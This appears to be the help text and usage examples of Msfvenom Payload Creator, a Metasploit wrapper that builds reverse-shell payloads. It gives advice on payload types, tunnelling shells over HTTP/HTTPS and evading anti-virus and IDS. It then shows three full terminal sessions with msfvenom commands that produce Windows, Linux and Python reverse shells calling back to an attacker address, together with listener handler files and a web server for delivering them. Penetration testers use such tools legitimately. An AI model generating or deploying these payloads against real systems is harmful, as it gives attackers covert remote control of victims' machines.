 [i] <BIND> allows for the attacker to connect whenever they wish. <REVERSE> needs to the target to be repeatedly connecting back to permanent maintain access.

 [i] <STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
 [i] <STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
 [i] Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
 [i]   Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
 [i] <STAGED> are 'better' in low-bandwidth/high-latency environments.
 [i] <STAGELESS> are seen as 'stealthier' when bypassing Anti-Virus protections. <STAGED> may work 'better' with IDS/IPS.
 [i] More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
 [i]                   https://www.offensive-security.com/metasploit-unleashed/payload-types/
 [i]                   https://www.offensive-security.com/metasploit-unleashed/payloads/

 [i] <TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
 [i] <HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
 [i] <HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
 [i] <FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
 [i] Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
 [i] By altering the traffic, such as <HTTP> and even more <HTTPS>, it will slow down the communication & increase the payload size.
 [i] More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication

 [i] <BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
 [i] <LOOP> will just create one of each <TYPE>.

 [i] <VERBOSE> will display more information.
root@kali:~#

Example #1 (Windows, Fully Automated With IP)

root@kali:~# mpc windows 192.168.1.10
 [*] Msfvenom Payload Creator (MPC v1.3)
 [i]   IP: 192.168.1.10
 [i] PORT: 443
 [i] TYPE: windows (windows/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 > /root/windows-meterpreter-staged-reverse-tcp-443.exe
 [i] File (/root/windows-meterpreter-staged-reverse-tcp-443.exe) already exists. Overwriting...
 [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
 [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'   (msfconsole -q -r /root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)
 [?] Quick web server for file transfer?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:~#

Example #2 (Linux Format, Fully Automated With Interface and Port)

root@kali:~# ./mpc elf eth0 4444
 [*] Msfvenom Payload Creator (MPC v1.3)
 [i]   IP: 192.168.103.238
 [i] PORT: 4444
 [i] TYPE: linux (linux/x86/shell/reverse_tcp)
 [i]  CMD: msfvenom -p linux/x86/shell/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST=192.168.103.238 LPORT=4444 > /root/linux-shell-staged-reverse-tcp-4444.elf
 [i] linux shell created: '/root/linux-shell-staged-reverse-tcp-4444.elf'
 [i] MSF handler file: '/root/linux-shell-staged-reverse-tcp-4444-elf.rc'   (msfconsole -q -r /root/linux-shell-staged-reverse-tcp-4444-elf.rc)
 [?] Quick web server for file transfer?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:~#

Example #3 (Python Format, Stageless Command Prompt Using Interactive IP Menu)

root@kali:~# mpc stageless cmd py verbose
 [*] Msfvenom Payload Creator (MPC v1.3)

 [i] Use which interface/IP address?:
 [i]   1.) eth0 - 192.168.103.238
 [i]   2.) eth1 - 192.168.155.175
 [i]   3.) tap0 - 10.10.100.63
 [i]   4.) lo - 127.0.0.1
 [i]   5.) wan - xx.xx.xx.xx
 [?] Select 1-5, interface or IP address: 3

 [i]        IP: 10.10.100.63
 [i]      PORT: 443
 [i]      TYPE: python (python/shell_reverse_tcp)
 [i]     SHELL: shell
 [i] DIRECTION: reverse
 [i]     STAGE: stageless
 [i]    METHOD: tcp
 [i]       CMD: msfvenom -p python/shell_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=10.10.100.63 LPORT=443 > /root/python-shell-stageless-reverse-tcp-443.py
 [i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py'
 [i] File: ASCII text, with very long lines, with no line terminators
 [i] Size: 4.0K
 [i]  MD5: 53452eafafe21bff94e6c4621525165b
 [i] SHA1: 18641444f084c5fe7e198c29bf705a68b15c2cc9
 [i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc'   (msfconsole -q -r /root/python-shell-stageless-reverse-tcp-443-py.rc)
 [?] Quick web server for file transfer?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:~#

To-Do List

• Shellcode generation
• x64 payloads
• IPv6 support
• Look into using OS scripting more (powershell_bind_tcp & bind_perl etc)

Download Msfvenom Payload Creator

Read More